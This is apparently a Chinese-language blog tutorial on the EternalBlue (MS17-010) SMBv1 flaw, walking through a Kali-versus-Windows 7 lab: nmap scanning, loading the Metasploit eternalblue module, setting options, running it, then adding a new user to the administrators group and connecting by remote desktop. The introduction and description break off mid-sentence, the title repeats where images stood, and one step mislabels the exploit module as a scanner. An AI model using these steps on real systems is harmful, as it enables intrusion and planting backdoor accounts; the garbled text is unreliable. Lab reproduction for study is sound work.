永恒之蓝(ms17-010)漏洞简介及复现

一、永恒之蓝简介与危害

永恒之蓝是指2017年4月14日晚,漏洞描述

Windows操作系统的SMBv1协议中存在漏洞复现

1.使用虚拟机打开kali与windows 7查看IP
(1)win 7作为靶机
(2)kali 作为攻击机
2.使用nmap获取目标主机的永恒之蓝(ms17-010)漏洞简介及复现
3.在kali中输入 msfconsole(打印图形化界面,比较慢)
msfconsole -q :不打印图形界面,可以快速启动
永恒之蓝(ms17-010)漏洞简介及复现
4.进入后输人search ms17-010(搜索漏洞)
永恒之蓝(ms17-010)漏洞简介及复现
5.使用扫描模块:exploit windows/smb/ms17_010_eternalblue
6.使用攻击模块:use exploitwindows/smb/ms17_010_eternalblue
7.查看需要设置的参数:show options
8.添加攻击参数:set+参数名(参数值)
一般修改(设置)ip地址,线程,端口就行
永恒之蓝(ms17-010)漏洞简介及复现
9.run或exploit进行攻击
永恒之蓝(ms17-010)漏洞简介及复现
10.在这里我们已经攻击成功,进入了对方的系统,但是我们看到了一些乱码,我们可以使用命令chcp 65001改变编码格式,解决乱码问题
11. 创建新用户:net user 用户名 密码/add
将用户添加到管理员组:net localgroup administrators 组名 /add
12.kali远程桌面连接win7:rdesktop ip :端口号
永恒之蓝(ms17-010)漏洞简介及复现

版权声明:玥玥 发表于 2021-07-28 4:32:36。
转载请注明:永恒之蓝(ms17-010)漏洞简介及复现 | 女黑客导航